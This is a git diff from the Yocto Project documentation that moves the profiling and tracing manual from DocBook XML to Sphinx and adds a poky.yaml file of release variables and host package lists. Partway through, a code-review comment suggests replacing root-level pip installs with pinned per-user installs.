-<!ENTITY YOCTO_RELEASE_DL_URL "&YOCTO_DL_URL;/releases/yocto/yocto-&DISTRO;">
-<!ENTITY YOCTO_TOOLCHAIN_DL_URL "&YOCTO_RELEASE_DL_URL;/toolchain/">
-<!ENTITY YOCTO_ADTINSTALLER_DL_URL "&YOCTO_RELEASE_DL_URL;/adt-installer">
-<!ENTITY YOCTO_POKY_DL_URL "&YOCTO_RELEASE_DL_URL;/&YOCTO_POKY;.tar.bz2">
-<!ENTITY YOCTO_MACHINES_DL_URL "&YOCTO_RELEASE_DL_URL;/machines">
-<!ENTITY YOCTO_QEMU_DL_URL "&YOCTO_MACHINES_DL_URL;/qemu">
-<!ENTITY YOCTO_PYTHON-i686_DL_URL "&YOCTO_DL_URL;/releases/miscsupport/python-nativesdk-standalone-i686.tar.bz2">
-<!ENTITY YOCTO_PYTHON-x86_64_DL_URL "&YOCTO_DL_URL;/releases/miscsupport/python-nativesdk-standalone-x86_64.tar.bz2">
-<!ENTITY YOCTO_DOCS_QS_URL "&YOCTO_DOCS_URL;/&YOCTO_DOC_VERSION;/yocto-project-qs/yocto-project-qs.html">
-<!ENTITY YOCTO_DOCS_ADT_URL "&YOCTO_DOCS_URL;/&YOCTO_DOC_VERSION;/adt-manual/adt-manual.html">
-<!ENTITY YOCTO_DOCS_REF_URL "&YOCTO_DOCS_URL;/&YOCTO_DOC_VERSION;/ref-manual/ref-manual.html">
-<!ENTITY YOCTO_DOCS_BSP_URL "&YOCTO_DOCS_URL;/&YOCTO_DOC_VERSION;/bsp-guide/bsp-guide.html">
-<!ENTITY YOCTO_DOCS_DEV_URL "&YOCTO_DOCS_URL;/&YOCTO_DOC_VERSION;/dev-manual/dev-manual.html">
-<!ENTITY YOCTO_DOCS_KERNEL_DEV_URL "&YOCTO_DOCS_URL;/&YOCTO_DOC_VERSION;/kernel-dev/kernel-dev.html">
-<!ENTITY YOCTO_DOCS_PROF_URL "&YOCTO_DOCS_URL;/&YOCTO_DOC_VERSION;/profile-manual/profile-manual.html">
-<!ENTITY YOCTO_DOCS_MM_URL "&YOCTO_DOCS_URL;/&YOCTO_DOC_VERSION;/mega-manual/mega-manual.html">
-<!ENTITY YOCTO_DOCS_BB_URL "&YOCTO_DOCS_URL;/&YOCTO_DOC_VERSION;/bitbake-user-manual/bitbake-user-manual.html">
-<!ENTITY YOCTO_DOCS_TOAST_URL "&YOCTO_DOCS_URL;/&YOCTO_DOC_VERSION;/toaster-manual/toaster-manual.html">
-<!ENTITY YOCTO_DOCS_SDK_URL "&YOCTO_DOCS_URL;/&YOCTO_DOC_VERSION;/sdk-manual/sdk-manual.html">
-<!ENTITY YOCTO_DOCS_OM_URL "&YOCTO_DOCS_URL;/&YOCTO_DOC_VERSION;/overview-manual/overview-manual.html">
-<!ENTITY YOCTO_DOCS_BRIEF_URL "&YOCTO_DOCS_URL;/&YOCTO_DOC_VERSION;/brief-yoctoprojectqs/brief-yoctoprojectqs.html">
-<!ENTITY YOCTO_ADTPATH_DIR "/opt/poky/&DISTRO;">
-<!ENTITY YOCTO_POKY_TARBALL "&YOCTO_POKY;.tar.bz2">
-<!ENTITY OE_INIT_PATH "&YOCTO_POKY;/oe-init-build-env">
-<!ENTITY OE_INIT_FILE "oe-init-build-env">
-<!ENTITY UBUNTU_HOST_PACKAGES_ESSENTIAL "gawk wget git-core diffstat unzip texinfo gcc-multilib \
- build-essential chrpath socat cpio python3 python3-pip python3-pexpect \
- xz-utils debianutils iputils-ping python3-git python3-jinja2 libegl1-mesa libsdl1.2-dev \
- pylint3 xterm">
-<!ENTITY FEDORA_HOST_PACKAGES_ESSENTIAL "gawk make wget tar bzip2 gzip python3 unzip perl patch \
- diffutils diffstat git cpp gcc gcc-c++ glibc-devel texinfo chrpath \
- ccache perl-Data-Dumper perl-Text-ParseWords perl-Thread-Queue perl-bignum socat \
- python3-pexpect findutils which file cpio python python3-pip xz python3-GitPython \
- python3-jinja2 SDL-devel xterm rpcgen">
-<!ENTITY OPENSUSE_HOST_PACKAGES_ESSENTIAL "python gcc gcc-c++ git chrpath make wget python-xml \
- diffstat makeinfo python-curses patch socat python3 python3-curses tar python3-pip \
- python3-pexpect xz which python3-Jinja2 Mesa-libEGL1 libSDL-devel xterm rpcgen
- $ sudo pip3 install GitPython">
-<!ENTITY CENTOS7_HOST_PACKAGES_ESSENTIAL "-y epel-release
- $ sudo yum makecache
- $ sudo yum install gawk make wget tar bzip2 gzip python3 unzip perl patch \
- diffutils diffstat git cpp gcc gcc-c++ glibc-devel texinfo chrpath socat \
- perl-Data-Dumper perl-Text-ParseWords perl-Thread-Queue python36-pip xz \
- which SDL-devel xterm
- $ sudo pip3 install GitPython jinja2">
-<!ENTITY CENTOS8_HOST_PACKAGES_ESSENTIAL "-y epel-release
- $ sudo dnf config-manager --set-enabled PowerTools
- $ sudo dnf makecache
- $ sudo dnf install gawk make wget tar bzip2 gzip python3 unzip perl patch \
- diffutils diffstat git cpp gcc gcc-c++ glibc-devel texinfo chrpath ccache \
- socat perl-Data-Dumper perl-Text-ParseWords perl-Thread-Queue python3-pip \
- python3-GitPython python3-jinja2 python3-pexpect xz which SDL-devel xterm \
- rpcgen">
diff --git a/documentation/poky.yaml b/documentation/poky.yaml
new file mode 100644
index 0000000000..0ab046428b
--- /dev/null
+++ b/documentation/poky.yaml
@@ -0,0 +1,44 @@
+DISTRO : "3.1.33"
+DISTRO_NAME_NO_CAP : "dunfell"
+DISTRO_NAME : "Dunfell"
+DISTRO_NAME_NO_CAP_MINUS_ONE : "zeus"
+YOCTO_DOC_VERSION : "3.1.33"
+YOCTO_DOC_VERSION_MINUS_ONE : "3.0.4"
+DISTRO_REL_TAG : "yocto-3.1.33"
+DOCCONF_VERSION : "3.1.33"
+BITBAKE_SERIES : "1.46"
+POKYVERSION : "23.0.33"
+YOCTO_POKY : "poky-&DISTRO_NAME_NO_CAP;-&POKYVERSION;"
+YOCTO_DL_URL : "https://downloads.yoctoproject.org"
+YOCTO_AB_URL : "https://autobuilder.yoctoproject.org"
+YOCTO_RELEASE_DL_URL : "&YOCTO_DL_URL;/releases/yocto/yocto-&DISTRO;"
+UBUNTU_HOST_PACKAGES_ESSENTIAL : "gawk wget git-core diffstat unzip texinfo gcc-multilib \
+ build-essential chrpath socat cpio python3 python3-pip python3-pexpect \
+ xz-utils debianutils iputils-ping python3-git python3-jinja2 libegl1-mesa libsdl1.2-dev \
+ pylint3 xterm python3-subunit mesa-common-dev"
+FEDORA_HOST_PACKAGES_ESSENTIAL : "gawk make wget tar bzip2 gzip python3 unzip perl patch \
+ diffutils diffstat git cpp gcc gcc-c++ glibc-devel texinfo chrpath \
+ ccache perl-Data-Dumper perl-Text-ParseWords perl-Thread-Queue perl-bignum socat \
+ python3-pexpect findutils which file cpio python python3-pip xz python3-GitPython \
+ python3-jinja2 SDL-devel xterm rpcgen mesa-libGL-devel perl-FindBin perl-File-Compare \
+ perl-File-Copy perl-locale"
+OPENSUSE_HOST_PACKAGES_ESSENTIAL : "python gcc gcc-c++ git chrpath make wget python-xml \
+ diffstat makeinfo python-curses patch socat python3 python3-curses tar python3-pip \
+ python3-pexpect xz which python3-Jinja2 Mesa-libEGL1 libSDL-devel xterm rpcgen Mesa-dri-devel
+ \n\ $ sudo pip3 install GitPython"
+CENTOS7_HOST_PACKAGES_ESSENTIAL : "-y epel-release
+ \n\ $ sudo yum makecache
+ \n\ $ sudo yum install gawk make wget tar bzip2 gzip python3 unzip perl patch \
+ diffutils diffstat git cpp gcc gcc-c++ glibc-devel texinfo chrpath socat \
+ perl-Data-Dumper perl-Text-ParseWords perl-Thread-Queue python36-pip xz \
+ which SDL-devel xterm mesa-libGL-devel
+ \n\ $ sudo pip3 install GitPython jinja2"
+CENTOS8_HOST_PACKAGES_ESSENTIAL : "-y epel-release
+ \n\ $ sudo dnf config-manager --set-enabled PowerTools
+ \n\ $ sudo dnf makecache
+ \n\ $ sudo dnf install gawk make wget tar bzip2 gzip python3 unzip perl patch \
+ diffutils diffstat git cpp gcc gcc-c++ glibc-devel texinfo chrpath ccache \
+ socat perl-Data-Dumper perl-Text-ParseWords perl-Thread-Queue python3-pip \
+ python3-GitPython python3-jinja2 python3-pexpect xz which SDL-devel xterm \
+ rpcgen mesa-libGL-devel"
+PIP3_HOST_PACKAGES_DOC : "$ sudo pip3 install sphinx sphinx_rtd_theme pyyaml"
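Review bot: `PIP3_HOST_PACKAGES_DOC` on the last line of this new file tells readers to run `sudo pip3 install sphinx sphinx_rtd_theme pyyaml`, which installs unpinned PyPI packages system-wide and runs their install-time code as root on the build host. Nothing visible here suggests the documentation toolchain needs a system-wide install, so a per-user or virtualenv install should be enough, e.g. `PIP3_HOST_PACKAGES_DOC : "$ pip3 install --user sphinx sphinx_rtd_theme pyyaml"`. The same pattern appears in the `sudo pip3 install GitPython` lines of the `OPENSUSE_HOST_PACKAGES_ESSENTIAL` and `CENTOS7_HOST_PACKAGES_ESSENTIAL` values, which were carried over from poky.ent and are worth revisiting together. Pinning the versions would also make the documentation build reproducible and limit exposure to a compromised upstream release.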
diff --git a/documentation/profile-manual/history.rst b/documentation/profile-manual/history.rst
new file mode 100644
index 0000000000..c4c64ff288
--- /dev/null
+++ b/documentation/profile-manual/history.rst
@@ -0,0 +1,70 @@
+.. SPDX-License-Identifier: CC-BY-SA-2.0-UK
+
+***********************
+Manual Revision History
+***********************
+
+.. list-table::
+ :widths: 10 15 40
+ :header-rows: 1
+
+ * - Revision
+ - Date
+ - Note
+ * - 1.4
+ - April 2013
+ - The initial document released with the Yocto Project 1.4 Release
+ * - 1.5
+ - October 2013
+ - Released with the Yocto Project 1.5 Release.
+ * - 1.6
+ - April 2014
+ - Released with the Yocto Project 1.6 Release.
+ * - 1.7
+ - October 2014
+ - Released with the Yocto Project 1.7 Release.
+ * - 1.8
+ - April 2015
+ - Released with the Yocto Project 1.8 Release.
+ * - 2.0
+ - October 2015
+ - Released with the Yocto Project 2.0 Release.
+ * - 2.1
+ - April 2016
+ - Released with the Yocto Project 2.1 Release.
+ * - 2.2
+ - October 2016
+ - Released with the Yocto Project 2.2 Release.
+ * - 2.3
+ - May 2017
+ - Released with the Yocto Project 2.3 Release.
+ * - 2.4
+ - October 2017
+ - Released with the Yocto Project 2.4 Release.
+ * - 2.5
+ - May 2018
+ - Released with the Yocto Project 2.5 Release.
+ * - 2.6
+ - November 2018
+ - Released with the Yocto Project 2.6 Release.
+ * - 2.7
+ - May 2019
+ - Released with the Yocto Project 2.7 Release.
+ * - 3.0
+ - October 2019
+ - Released with the Yocto Project 3.0 Release.
+ * - 3.1
+ - April 2020
+ - Released with the Yocto Project 3.1 Release.
+ * - 3.1.1
+ - June 2020
+ - Released with the Yocto Project 3.1.1 Release.
+ * - 3.1.2
+ - August 2020
+ - Released with the Yocto Project 3.1.2 Release.
+ * - 3.1.3
+ - September 2020
+ - Released with the Yocto Project 3.1.3 Release.
+ * - 3.1.4
+ - November 2020
+ - Released with the Yocto Project 3.1.4 Release.
diff --git a/documentation/profile-manual/profile-manual-arch.rst b/documentation/profile-manual/profile-manual-arch.rst
new file mode 100644
index 0000000000..73cd0c29e5
--- /dev/null
+++ b/documentation/profile-manual/profile-manual-arch.rst
@@ -0,0 +1,29 @@
+.. SPDX-License-Identifier: CC-BY-SA-2.0-UK
+
+*************************************************************
+Overall Architecture of the Linux Tracing and Profiling Tools
+*************************************************************
+
+Architecture of the Tracing and Profiling Tools
+===============================================
+
+It may seem surprising to see a section covering an 'overall
+architecture' for what seems to be a random collection of tracing tools
+that together make up the Linux tracing and profiling space. The fact
+is, however, that in recent years this seemingly disparate set of tools
+has started to converge on a 'core' set of underlying mechanisms:
+
+- static tracepoints
+- dynamic tracepoints
+
+ - kprobes
+ - uprobes
+
+- the perf_events subsystem
+- debugfs
+
+.. admonition:: Tying it Together
+
+ Rather than enumerating here how each tool makes use of these common
+ mechanisms, textboxes like this will make note of the specific usages
+ in each tool as they come up in the course of the text.
diff --git a/documentation/profile-manual/profile-manual-arch.xml b/documentation/profile-manual/profile-manual-arch.xml
deleted file mode 100644
index 19d1155229..0000000000
--- a/documentation/profile-manual/profile-manual-arch.xml
+++ /dev/null
@@ -1,45 +0,0 @@
-<!DOCTYPE chapter PUBLIC "-//OASIS//DTD DocBook XML V4.2//EN"
-"http://www.oasis-open.org/docbook/xml/4.2/docbookx.dtd"
-[<!ENTITY % poky SYSTEM "../poky.ent"> %poky; ] >
-
-<chapter id='profile-manual-arch'>
-
-<title>Overall Architecture of the Linux Tracing and Profiling Tools</title>
-
-<section id='architecture-of-the-tracing-and-profiling-tools'>
- <title>Architecture of the Tracing and Profiling Tools</title>
-
- <para>
- It may seem surprising to see a section covering an 'overall architecture'
- for what seems to be a random collection of tracing tools that together
- make up the Linux tracing and profiling space.
- The fact is, however, that in recent years this seemingly disparate
- set of tools has started to converge on a 'core' set of underlying
- mechanisms:
- </para>
-
- <para>
- <itemizedlist>
- <listitem>static tracepoints</listitem>
- <listitem>dynamic tracepoints
- <itemizedlist>
- <listitem>kprobes</listitem>
- <listitem>uprobes</listitem>
- </itemizedlist>
- </listitem>
- <listitem>the perf_events subsystem</listitem>
- <listitem>debugfs</listitem>
- </itemizedlist>
- </para>
-
- <informalexample>
- <emphasis>Tying it Together:</emphasis> Rather than enumerating here how each tool makes use of
- these common mechanisms, textboxes like this will make note of the
- specific usages in each tool as they come up in the course
- of the text.
- </informalexample>
-</section>
-</chapter>
-<!--
-vim: expandtab tw=80 ts=4
--->
diff --git a/documentation/profile-manual/profile-manual-customization.xsl b/documentation/profile-manual/profile-manual-customization.xsl
deleted file mode 100644
index caa57ef342..0000000000
--- a/documentation/profile-manual/profile-manual-customization.xsl
+++ /dev/null
@@ -1,27 +0,0 @@
-<?xml version='1.0'?>
-<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns="http://www.w3.org/1999/xhtml" xmlns:fo="http://www.w3.org/1999/XSL/Format" version="1.0">
-
- <xsl:import href="http://downloads.yoctoproject.org/mirror/docbook-mirror/docbook-xsl-1.76.1/xhtml/docbook.xsl" />
-
-<!--
-
- <xsl:import href="../template/1.76.1/docbook-xsl-1.76.1/xhtml/docbook.xsl" />
-
- <xsl:import href="http://docbook.sourceforge.net/release/xsl/1.76.1/xhtml/docbook.xsl" />
-
--->
-
- <xsl:include href="../template/permalinks.xsl"/>
- <xsl:include href="../template/section.title.xsl"/>
- <xsl:include href="../template/component.title.xsl"/>
- <xsl:include href="../template/division.title.xsl"/>
- <xsl:include href="../template/formal.object.heading.xsl"/>
-
- <xsl:param name="html.stylesheet" select="'profile-manual-style.css'" />
- <xsl:param name="chapter.autolabel" select="1" />
- <xsl:param name="appendix.autolabel" select="A" />
- <xsl:param name="section.autolabel" select="1" />
- <xsl:param name="section.label.includes.component.label" select="1" />
- <xsl:param name="generate.id.attributes" select="1" />
-
-</xsl:stylesheet>
diff --git a/documentation/profile-manual/profile-manual-examples.rst b/documentation/profile-manual/profile-manual-examples.rst
new file mode 100644
index 0000000000..97a9e9e21a
--- /dev/null
+++ b/documentation/profile-manual/profile-manual-examples.rst
@@ -0,0 +1,24 @@
+.. SPDX-License-Identifier: CC-BY-SA-2.0-UK
+
+*******************
+Real-World Examples
+*******************
+
+|
+
+This chapter contains real-world examples.
+
+Slow Write Speed on Live Images
+===============================
+
+In one of our previous releases (denzil), users noticed that booting off
+of a live image and writing to disk was noticeably slower. This included
+the boot itself, especially the first one, since first boots tend to do
+a significant amount of writing due to certain post-install scripts.
+
+The problem (and solution) was discovered by using the Yocto tracing
+tools, in this case 'perf stat', 'perf script', 'perf record' and 'perf
+report'.
+
+See all the unvarnished details of how this bug was diagnosed and solved
+here: Yocto Bug #3049
diff --git a/documentation/profile-manual/profile-manual-examples.xml b/documentation/profile-manual/profile-manual-examples.xml
deleted file mode 100644
index 9630c6c307..0000000000
--- a/documentation/profile-manual/profile-manual-examples.xml
+++ /dev/null
@@ -1,39 +0,0 @@
-<!DOCTYPE chapter PUBLIC "-//OASIS//DTD DocBook XML V4.2//EN"
-"http://www.oasis-open.org/docbook/xml/4.2/docbookx.dtd"
-[<!ENTITY % poky SYSTEM "../poky.ent"> %poky; ] >
-
-<chapter id='profile-manual-examples'>
-
-<title>Real-World Examples</title>
-
-<para>
- This chapter contains real-world examples.
-</para>
-
-<section id='slow-write-speed-on-live-images'>
- <title>Slow Write Speed on Live Images</title>
-
- <para>
- In one of our previous releases (denzil), users noticed that booting
- off of a live image and writing to disk was noticeably slower.
- This included the boot itself, especially the first one, since first
- boots tend to do a significant amount of writing due to certain
- post-install scripts.
- </para>
-
- <para>
- The problem (and solution) was discovered by using the Yocto tracing
- tools, in this case 'perf stat', 'perf script', 'perf record'
- and 'perf report'.
- </para>
-
- <para>
- See all the unvarnished details of how this bug was diagnosed and
- solved here: Yocto Bug #3049
- </para>
-</section>
-
-</chapter>
-<!--
-vim: expandtab tw=80 ts=4
--->
diff --git a/documentation/profile-manual/profile-manual-intro.rst b/documentation/profile-manual/profile-manual-intro.rst
new file mode 100644
index 0000000000..0d435e0c0c
--- /dev/null
+++ b/documentation/profile-manual/profile-manual-intro.rst
@@ -0,0 +1,79 @@
+.. SPDX-License-Identifier: CC-BY-SA-2.0-UK
+
+******************************************
+Yocto Project Profiling and Tracing Manual
+******************************************
+
+.. _profile-intro:
+
+Introduction
+============
+
+Yocto bundles a number of tracing and profiling tools - this 'HOWTO'
+describes their basic usage and shows by example how to make use of them
+to examine application and system behavior.
+
+The tools presented are for the most part completely open-ended and have
+quite good and/or extensive documentation of their own which can be used
+to solve just about any problem you might come across in Linux. Each
+section that describes a particular tool has links to that tool's
+documentation and website.
+
+The purpose of this 'HOWTO' is to present a set of common and generally
+useful tracing and profiling idioms along with their application (as
+appropriate) to each tool, in the context of a general-purpose
+'drill-down' methodology that can be applied to solving a large number
+(90%?) of problems. For help with more advanced usages and problems,
+please see the documentation and/or websites listed for each tool.
+
+The final section of this 'HOWTO' is a collection of real-world examples
+which we'll be continually adding to as we solve more problems using the
+tools - feel free to add your own examples to the list!
+
+.. _profile-manual-general-setup:
+
+General Setup
+=============
+
+Most of the tools are available only in 'sdk' images or in images built
+after adding 'tools-profile' to your local.conf. So, in order to be able
+to access all of the tools described here, please first build and boot
+an 'sdk' image e.g. ::
+
+ $ bitbake core-image-sato-sdk
+
+or alternatively by adding 'tools-profile' to the EXTRA_IMAGE_FEATURES line in
+your local.conf: ::
+
+ EXTRA_IMAGE_FEATURES = "debug-tweaks tools-profile"
+
+If you use the 'tools-profile' method, you don't need to build an sdk image -
+the tracing and profiling tools will be included in non-sdk images as well e.g.: ::
+
+ $ bitbake core-image-sato
+
+.. note::
+
+ By default, the Yocto build system strips symbols from the binaries
+ it packages, which makes it difficult to use some of the tools.
+
+ You can prevent that by setting the
+ :term:`INHIBIT_PACKAGE_STRIP`
+ variable to "1" in your ``local.conf`` when you build the image: ::
+
+ INHIBIT_PACKAGE_STRIP = "1"
+
+ The above setting will noticeably increase the size of your image.
+
+If you've already built a stripped image, you can generate debug
+packages (xxx-dbg) which you can manually install as needed.
+
+To generate debug info for packages, you can add dbg-pkgs to
+EXTRA_IMAGE_FEATURES in local.conf. For example: ::
+
+ EXTRA_IMAGE_FEATURES = "debug-tweaks tools-profile dbg-pkgs"
+
+Additionally, in order to generate the right type of debuginfo, we also need to
+set :term:`PACKAGE_DEBUG_SPLIT_STYLE` in the ``local.conf`` file: ::
+
+ PACKAGE_DEBUG_SPLIT_STYLE = 'debug-file-directory'
diff --git a/documentation/profile-manual/profile-manual-intro.xml b/documentation/profile-manual/profile-manual-intro.xml
deleted file mode 100644
index f16db3f0f2..0000000000
--- a/documentation/profile-manual/profile-manual-intro.xml
+++ /dev/null
@@ -1,106 +0,0 @@
-<!DOCTYPE chapter PUBLIC "-//OASIS//DTD DocBook XML V4.2//EN"
-"http://www.oasis-open.org/docbook/xml/4.2/docbookx.dtd"
-[<!ENTITY % poky SYSTEM "../poky.ent"> %poky; ] >
-
-<chapter id='profile-manual-intro'>
-
-<title>Yocto Project Profiling and Tracing Manual</title>
- <section id='profile-intro'>
- <title>Introduction</title>
-
- <para>
- Yocto bundles a number of tracing and profiling tools - this 'HOWTO'
- describes their basic usage and shows by example how to make use
- of them to examine application and system behavior.
- </para>
-
- <para>
- The tools presented are for the most part completely open-ended and
- have quite good and/or extensive documentation of their own which
- can be used to solve just about any problem you might come across
- in Linux.
- Each section that describes a particular tool has links to that
- tool's documentation and website.
- </para>
-
- <para>
- The purpose of this 'HOWTO' is to present a set of common and
- generally useful tracing and profiling idioms along with their
- application (as appropriate) to each tool, in the context of a
- general-purpose 'drill-down' methodology that can be applied
- to solving a large number (90%?) of problems.
- For help with more advanced usages and problems, please see
- the documentation and/or websites listed for each tool.
- </para>
-
- <para>
- The final section of this 'HOWTO' is a collection of real-world
- examples which we'll be continually adding to as we solve more
- problems using the tools - feel free to add your own examples
- to the list!
- </para>
- </section>
-
- <section id='profile-manual-general-setup'>
- <title>General Setup</title>
-
- <para>
- Most of the tools are available only in 'sdk' images or in images
- built after adding 'tools-profile' to your local.conf.
- So, in order to be able to access all of the tools described here,
- please first build and boot an 'sdk' image e.g.
- <literallayout class='monospaced'>
- $ bitbake core-image-sato-sdk
- </literallayout>
- or alternatively by adding 'tools-profile' to the
- EXTRA_IMAGE_FEATURES line in your local.conf:
- <literallayout class='monospaced'>
- EXTRA_IMAGE_FEATURES = "debug-tweaks tools-profile"
- </literallayout>
- If you use the 'tools-profile' method, you don't need to build an
- sdk image - the tracing and profiling tools will be included in
- non-sdk images as well e.g.:
- <literallayout class='monospaced'>
- $ bitbake core-image-sato
- </literallayout>
- <note><para>
- By default, the Yocto build system strips symbols from the
- binaries it packages, which makes it difficult to use some
- of the tools.
- </para><para>You can prevent that by setting the
- <ulink url='&YOCTO_DOCS_REF_URL;#var-INHIBIT_PACKAGE_STRIP'><filename>INHIBIT_PACKAGE_STRIP</filename></ulink>
- variable to "1" in your
- <filename>local.conf</filename> when you build the image:
- </para>
- </note>
- <literallayout class='monospaced'>
- INHIBIT_PACKAGE_STRIP = "1"
- </literallayout>
- The above setting will noticeably increase the size of your image.
- </para>
-
- <para>
- If you've already built a stripped image, you can generate
- debug packages (xxx-dbg) which you can manually install as
- needed.
- </para>
-
- <para>
- To generate debug info for packages, you can add dbg-pkgs to
- EXTRA_IMAGE_FEATURES in local.conf. For example:
- <literallayout class='monospaced'>
- EXTRA_IMAGE_FEATURES = "debug-tweaks tools-profile dbg-pkgs"
- </literallayout>
- Additionally, in order to generate the right type of
- debuginfo, we also need to set
- <ulink url='&YOCTO_DOCS_REF_URL;#var-PACKAGE_DEBUG_SPLIT_STYLE'><filename>PACKAGE_DEBUG_SPLIT_STYLE</filename></ulink>
- in the <filename>local.conf</filename> file:
- <literallayout class='monospaced'>
- PACKAGE_DEBUG_SPLIT_STYLE = 'debug-file-directory'
- </literallayout>
- </para>
- </section>
-</chapter>
-<!--
-vim: expandtab tw=80 ts=4
--->
diff --git a/documentation/profile-manual/profile-manual-style.css b/documentation/profile-manual/profile-manual-style.css
deleted file mode 100644
index f3cca8536d..0000000000
--- a/documentation/profile-manual/profile-manual-style.css
+++ /dev/null
@@ -1,984 +0,0 @@
-/*
- Generic XHTML / DocBook XHTML CSS Stylesheet.
-
- Browser wrangling and typographic design by
- Oyvind Kolas / pippin@gimp.org
-
- Customised for Poky by
- Matthew Allum / mallum@o-hand.com
-
- Thanks to:
- Liam R. E. Quin
- William Skaggs
- Jakub Steiner
-
- Structure
- ---------
-
- The stylesheet is divided into the following sections:
-
- Positioning
- Margins, paddings, width, font-size, clearing.
- Decorations
- Borders, style
- Colors
- Colors
- Graphics
- Graphical backgrounds
- Nasty IE tweaks
- Workarounds needed to make it work in internet explorer,
- currently makes the stylesheet non validating, but up until
- this point it is validating.
- Mozilla extensions
- Transparency for footer
- Rounded corners on boxes
-
-*/
-
-
- /*************** /
- / Positioning /
-/ ***************/
-
-body {
- font-family: Verdana, Sans, sans-serif;
-
- min-width: 640px;
- width: 80%;
- margin: 0em auto;
- padding: 2em 5em 5em 5em;
- color: #333;
-}
-
-h1,h2,h3,h4,h5,h6,h7 {
- font-family: Arial, Sans;
- color: #00557D;
- clear: both;
-}
-
-h1 {
- font-size: 2em;
- text-align: left;
- padding: 0em 0em 0em 0em;
- margin: 2em 0em 0em 0em;
-}
-
-h2.subtitle {
- margin: 0.10em 0em 3.0em 0em;
- padding: 0em 0em 0em 0em;
- font-size: 1.8em;
- padding-left: 20%;
- font-weight: normal;
- font-style: italic;
-}
-
-h2 {
- margin: 2em 0em 0.66em 0em;
- padding: 0.5em 0em 0em 0em;
- font-size: 1.5em;
- font-weight: bold;
-}
-
-h3.subtitle {
- margin: 0em 0em 1em 0em;
- padding: 0em 0em 0em 0em;
- font-size: 142.14%;
- text-align: right;
-}
-
-h3 {
- margin: 1em 0em 0.5em 0em;
- padding: 1em 0em 0em 0em;
- font-size: 140%;
- font-weight: bold;
-}
-
-h4 {
- margin: 1em 0em 0.5em 0em;
- padding: 1em 0em 0em 0em;
- font-size: 120%;
- font-weight: bold;
-}
-
-h5 {
- margin: 1em 0em 0.5em 0em;
- padding: 1em 0em 0em 0em;
- font-size: 110%;
- font-weight: bold;
-}
-
-h6 {
- margin: 1em 0em 0em 0em;
- padding: 1em 0em 0em 0em;
- font-size: 110%;
- font-weight: bold;
-}
-
-.authorgroup {
- background-color: transparent;
- background-repeat: no-repeat;
- padding-top: 256px;
- background-image: url("figures/profile-title.png");
- background-position: left top;
- margin-top: -256px;
- padding-right: 50px;
- margin-left: 0px;
- text-align: right;
- width: 740px;
-}
-
-h3.author {
- margin: 0em 0me 0em 0em;
- padding: 0em 0em 0em 0em;
- font-weight: normal;
- font-size: 100%;
- color: #333;
- clear: both;
-}
-
-.author tt.email {
- font-size: 66%;
-}
-
-.titlepage hr {
- width: 0em;
- clear: both;
-}
-
-.revhistory {
- padding-top: 2em;
- clear: both;
-}
-
-.toc,
-.list-of-tables,
-.list-of-examples,
-.list-of-figures {
- padding: 1.33em 0em 2.5em 0em;
- color: #00557D;
-}
-
-.toc p,
-.list-of-tables p,
-.list-of-figures p,
-.list-of-examples p {
- padding: 0em 0em 0em 0em;
- padding: 0em 0em 0.3em;
- margin: 1.5em 0em 0em 0em;
-}
-
-.toc p b,
-.list-of-tables p b,
-.list-of-figures p b,
-.list-of-examples p b{
- font-size: 100.0%;
- font-weight: bold;
-}
-
-.toc dl,
-.list-of-tables dl,
-.list-of-figures dl,
-.list-of-examples dl {
- margin: 0em 0em 0.5em 0em;
- padding: 0em 0em 0em 0em;
-}
-
-.toc dt {
- margin: 0em 0em 0em 0em;
- padding: 0em 0em 0em 0em;
-}
-
-.toc dd {
- margin: 0em 0em 0em 2.6em;
- padding: 0em 0em 0em 0em;
-}
-
-div.glossary dl,
-div.variablelist dl {
-}
-
-.glossary dl dt,
-.variablelist dl dt,
-.variablelist dl dt span.term {
- font-weight: normal;
- width: 20em;
- text-align: right;
-}
-
-.variablelist dl dt {
- margin-top: 0.5em;
-}
-
-.glossary dl dd,
-.variablelist dl dd {
- margin-top: -1em;
- margin-left: 25.5em;
-}
-
-.glossary dd p,
-.variablelist dd p {
- margin-top: 0em;
- margin-bottom: 1em;
-}
-
-
-div.calloutlist table td {
- padding: 0em 0em 0em 0em;
- margin: 0em 0em 0em 0em;
-}
-
-div.calloutlist table td p {
- margin-top: 0em;
- margin-bottom: 1em;
-}
-
-div p.copyright {
- text-align: left;
-}
-
-div.legalnotice p.legalnotice-title {
- margin-bottom: 0em;
-}
-
-p {
- line-height: 1.5em;
- margin-top: 0em;
-
-}
-
-dl {
- padding-top: 0em;
-}
-
-hr {
- border: solid 1px;
-}
-
-
-.mediaobject,
-.mediaobjectco {
- text-align: center;
-}
-
-img {
- border: none;
-}
-
-ul {
- padding: 0em 0em 0em 1.5em;
-}
-
-ul li {
- padding: 0em 0em 0em 0em;
-}
-
-ul li p {
- text-align: left;
-}
-
-table {
- width :100%;
-}
-
-th {
- padding: 0.25em;
- text-align: left;
- font-weight: normal;
- vertical-align: top;
-}
-
-td {
- padding: 0.25em;
- vertical-align: top;
-}
-
-p a[id] {
- margin: 0px;
- padding: 0px;
- display: inline;
- background-image: none;
-}
-
-a {
- text-decoration: underline;
- color: #444;
-}
-
-pre {
- overflow: auto;
-}
-
-a:hover {
- text-decoration: underline;
- /*font-weight: bold;*/
-}
-
-/* This style defines how the permalink character
- appears by itself and when hovered over with
- the mouse. */
-
-[alt='Permalink'] { color: #eee; }
-[alt='Permalink']:hover { color: black; }
-
-
-div.informalfigure,
-div.informalexample,
-div.informaltable,
-div.figure,
-div.table,
-div.example {
- margin: 1em 0em;
- padding: 1em;
- page-break-inside: avoid;
-}
-
-
-div.informalfigure p.title b,
-div.informalexample p.title b,
-div.informaltable p.title b,
-div.figure p.title b,
-div.example p.title b,
-div.table p.title b{
- padding-top: 0em;
- margin-top: 0em;
- font-size: 100%;
- font-weight: normal;
-}
-
-.mediaobject .caption,
-.mediaobject .caption p {
- text-align: center;
- font-size: 80%;
- padding-top: 0.5em;
- padding-bottom: 0.5em;
-}
-
-.epigraph {
- padding-left: 55%;
- margin-bottom: 1em;
-}
-
-.epigraph p {
- text-align: left;
-}
-
-.epigraph .quote {
- font-style: italic;
-}
-.epigraph .attribution {
- font-style: normal;
- text-align: right;
-}
-
-span.application {
- font-style: italic;
-}
-
-.programlisting {
- font-family: monospace;
- font-size: 80%;
- white-space: pre;
- margin: 1.33em 0em;
- padding: 1.33em;
-}
-
-.tip,
-.warning,
-.caution,
-.note {
- margin-top: 1em;
- margin-bottom: 1em;
-
-}
-
-/* force full width of table within div */
